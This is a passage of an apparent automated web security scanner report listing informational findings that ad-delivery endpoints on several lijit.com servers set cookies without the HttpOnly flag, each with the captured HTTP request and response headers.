Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[1509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B1509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[7851509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B7851509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315190056_354.deleted_785354.deleted_63.deleted_78563.deleted_1509702.deleted_7851509702.deleted; expires=Wed, 05-Oct-2011 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.12_354.deleted_785354.deleted_63.deleted_78563.deleted_1509702.deleted_7851509702.deleted; expires=Tue, 04-Sep-2012 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.12_354.deleted_785354.deleted_63.deleted_78563.deleted_1509702.deleted_7851509702.deleted; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.115. http://vap1iad1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1iad1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_href&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_href&cb=f46cf88e15 HTTP/1.1
Host: vap1iad1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.1264765
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315189969; OACAP=785.7; OASCAP=785.7; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315190041; expires=Wed, 05-Oct-2011 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=-553; expires=Tue, 04-Sep-2012 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=-553; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315190041_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.554_354.0_785354.0_63.0_78563.0; expires=Tue, 04-Sep-2012 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.554_354.0_785354.0_63.0_78563.0; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.116. http://vap1iad2.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1iad2.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_open&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_open&cb=1de5903c89 HTTP/1.1
Host: vap1iad2.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.4080622
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315189866; OACAP=785.3; OASCAP=785.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315189871; expires=Wed, 05-Oct-2011 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.deleted_354.deleted_785354.deleted; expires=Wed, 05-Oct-2011 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.3_354.0_785354.0; expires=Tue, 04-Sep-2012 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.3_354.0_785354.0; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.117. http://vap1sfo1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1sfo1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_writeln&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_writeln&cb=bc930de640 HTTP/1.1
Host: vap1sfo1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.9388239
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315189871; OACAP=785.4; OASCAP=785.4

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315189882; expires=Wed, 05-Oct-2011 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:21 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315189882_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.5_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Tue, 04-Sep-2012 02:31:22 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.5_354.deleted_785354.deleted_63.deleted_78563.deleted; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.118. http://vap2den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap2den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&referer=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&cb=3701643a83 HTTP/1.1
Host: vap2den1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.45924899890087545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315189882; OACAP=785.5; OASCAP=785.5

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315189886; expires=Wed, 05-Oct-2011 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:25 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315189886_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.2_354.0_785354.0_63.0_78563.0; expires=Tue, 04-Sep-2012 02:31:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.2_354.0_785354.0_63.0_78563.0; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.119. http://vap2iad1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap2iad1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_target&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_target&cb=7d49486027 HTTP/1.1
Host: vap2iad1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.5322077
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315190046; OACAP=785.9; OASCAP=785.9

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:32:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315189946; expires=Wed, 05-Oct-2011 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
